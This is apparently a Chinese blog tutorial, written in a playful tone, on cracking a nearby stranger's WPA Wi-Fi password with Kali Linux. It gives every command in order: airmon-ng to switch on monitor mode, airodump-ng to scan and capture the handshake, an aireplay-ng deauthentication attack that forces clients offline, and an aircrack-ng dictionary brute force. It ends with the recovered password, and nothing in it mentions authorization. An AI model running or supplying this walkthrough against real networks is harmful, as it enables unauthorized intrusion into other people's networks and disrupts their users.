admin管理员组

文章数量:1619279

我们需要的东西

1.外接网卡
2.Kali系统

准备开始

咱们打开终端输入命令:iwconfig

咱们先看看网卡,wlan0就是了,没有wlan0就重新插入USB无线网卡,再重新连接到虚拟机里

我们打开网卡监听模式,命令:airmon-ng start wlan0

我们再次输入iwconfig命令看看,如果要是变成了wlan0mon就算成功了,没变的话可能有其他的网卡进程,我们只需要
命令:airmon-ng check kill杀死进程就可以了,再重新开启监听就行了

我们开始扫描附近的WiFi,命令:airodump-ng wlan0mon

扫的差不多了,我们点击ctrl+c停止
附近的WiFi就一一列举出来了

看来看去终于找到WiFi名字叫Wi-Fi-0987,信道(CH)为6,BSSID为6A:9A:C2:F2:6C:A2
先抓一下包
我的命令:airodump-ng -c 6 –bssid 6A:9A:C2:F2:6C:A2 -w /home/kali/zhutou/zhu wlan0mon
命令:airodump-ng -c (CH) –bssid (BSSID) -w (存放的路径) wlan0mon
如果抓到包了就会出现WPS handshake:

如果没抓到包的话我们也不要急,我们想想办法,我们利用aireplay-ng这个命令攻击wifi10次,让WiFi断网,然后当WiFi重新连接的时候,我们就抓到包了
我的命令:aireplay-ng -0 10 -a 6A:9A:C2:F2:6C:A2 -c 1A:F2:FD:97:34:2B wlan0mon
命令:aireplay-ng -0 10 -a (BSSID) -c (STATION) wlan0mon

我们抓到包了,就可以对包进行暴力破解
我的命令:aircrack-ng -w /home/kali/zhutou/1.txt -b 6A:9A:C2:F2:6C:A2 zhu-01.cap
命令:aircrack-ng -w (字典路径) -b (BSSID) (抓到包的名称)

哈哈,我们破解成功了,密码是pigpig666

本文标签: 密码KaliLinuxwifi